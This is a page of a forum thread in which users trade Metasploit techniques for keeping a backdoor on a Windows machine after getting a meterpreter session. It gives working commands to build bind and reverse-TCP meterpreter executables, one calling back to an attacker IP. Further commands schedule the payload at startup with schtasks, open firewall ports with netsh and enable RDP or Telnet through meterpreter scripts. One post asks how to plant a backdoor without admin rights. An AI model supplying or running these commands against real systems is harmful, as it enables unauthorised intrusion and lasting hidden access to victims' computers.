Page 2 of 5 FirstFirst 1234 ... LastLast
Results 11 to 20 of 45

Thread: Opening backdoor after getting meterpreter session

  1. #11
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    meterpreter >
    Background session 3? [y/N]
    msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
    [-] Invalid gateway specified.
    msf exploit(handler) >
    Well, it should be
    Code:
    route add 192.168.1.0 255.255.255.0 3
    Since the sessions is #3.


    To the other problem: lynx will break the shell here.
    Don't eat yellow snow :rolleyes:

  2. #12
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by phoenix910 View Post
    I use "links", as opposed to "lynx", but whatever floats your boat Also, as per my tutorial, just execute "links" and make sure you're interacting with the process, then you can tell it to browse to yahoo.com from there.

    ~phoenix910
    Did you use this one:
    http://links.sourceforge.net/
    I uploaded the exe file & dll's..... again locally it's working (although 192.168.1.1 doesn't work), but not remotely. I tried "execute -f links.exe -H -c -i" from meterpreter session and also tried to run cmd first & then "links" from the shell...... any idea??

    Quote Originally Posted by hawaii67 View Post
    Well, it should be
    Code:
    route add 192.168.1.0 255.255.255.0 3
    Since the sessions is #3.


    To the other problem: lynx will break the shell here.
    Thanks a lot.... will try it

  3. #13

    Default

    why not use Metasploit it self? create a payload with msfpayload something like this:
    Code:
    /msfpayload windows/meterpreter/bind_tcp LPORT=8080 R | ./msfencode -c 2 -t exe -o 345532.exe
    then upload the exe into %WINDIR%\System32\ , shecdule it to run every time the server is reboted like this:

    Code:
    schtasks /create /tn "SysCheckonStart" /tr c:\windows\system32\345532.exe /sc onstart
    then configure the built in firewall to let the conection to this port thru:

    Code:
    netsh firewall set portopening protocol = tcp port = 8080 mode = enable'
    or better yet create an account and enable RDP or Telnet you can use my meterpreter script that is part of Metasploit 3.2 just run in meterpreter
    Code:
    run getgui -h
    run gettelnet -h
    for the options it will do all the heavy lifting for you, if you only have shell follow this post on my blog:

    http://darkoperator.blogspot.com/200...-shell-in.html

    there are many ways to skin the cat I hope this sets you in the right direction and sorry for the self promotion by mentioning my scripts and blog

  4. #14
    Junior Member Tr00g33k's Avatar
    Join Date
    Jul 2008
    Posts
    46

    Default

    BadKarmaPR I liked your post very much especialy that one with the firewall port forwarding. Is there any way(maybe option in metasploit),maybe some program or something to forward ports through ROUTER without accessing router page?

    Thnx in advance,
    Tr00G33k

  5. #15
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    sorry for the self promotion by mentioning my scripts and blog
    Nonsense, You contributions to metasploit and backtrack are very valuable.

  6. #16
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    ok i have a shell in to my vista box, but i dont have admin priv, so how do i set up a backdoor with out admin priv?

  7. #17

    Default

    Quote Originally Posted by Tr00g33k View Post
    BadKarmaPR I liked your post very much especialy that one with the firewall port forwarding. Is there any way(maybe option in metasploit),maybe some program or something to forward ports through ROUTER without accessing router page?

    Thnx in advance,
    Tr00G33k
    Thanks, sadly the portfwrd command in meterpreter in version 3.2 is broken you might try to get a copy of 3.0 and test on it and also on 3.1 with reverse shell since it fails on the bind shell since its conception.

  8. #18

    Default

    Quote Originally Posted by cr1spyj0nes View Post
    ok i have a shell in to my vista box, but i dont have admin priv, so how do i set up a backdoor with out admin priv?
    if UAC is enabled this is going to be a hard one to make, you can place it in the programs startup folder. schtasks should let you schedule as the user the same as AT.

  9. #19
    Junior Member Tr00g33k's Avatar
    Join Date
    Jul 2008
    Posts
    46

    Default

    Portfwrd in metasploit, actualy forward port through router, firewall,etc.(it`s meant to do this)?If I understand correctly?

    Tr00G33k

  10. #20
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Thanks a lot for the reply. However, for few reasons (one could be my improper knowledge), I couldn't use any of these:

    Failure of 1st solution
    Quote Originally Posted by BadKarmaPR View Post
    why not use Metasploit it self?
    Because I prepared the exe file
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=82.24.180.xxx LPORT=7777 R | ./msfencode -b '' -t exe -o toBT3box.exe
    then placed the exe into vista box with public IP of 82.24.180.yyy (yes, it's different). The exe connects back to the attacker ONLY if the exploit is running at the time of execution of the exe file. That means the exe file only tries ONCE to connect to the BT3 box, if it fails to connect (which happens when BT3 is not listening), vista shows an error message "toBT3box.exe has stopped working .... bla bla bla".

    So, there is no point of making the exe file scheduled to run every time server reboots. I saved the exe file in windows folder & edited remote registry to run it every time the computer restarts. This is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts) & if I miss it then will have to wait until other one restarts.

    Failure of 2nd solution
    or better yet create an account and enable RDP or Telnet you can use my meterpreter script that is part of Metasploit 3.2 just run in meterpreter
    Code:
    run getgui -h
    run gettelnet -h
    I tried to this one earlier, didn't work. Please look to my 1st post of this thread for details. I used nc to listen at port 8888. Then tried to connect to the box from BT3 (82.24.180.xxx) like this:
    Code:
    nc 82.24.180.yyy 8888
    The command is not working, because we didn't ask the router to forward 8888 request to vista box. And in the real world I (or the attacker) wouldn't be able to configure the router of the victim box.

    Am I missing something???

Page 2 of 5 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •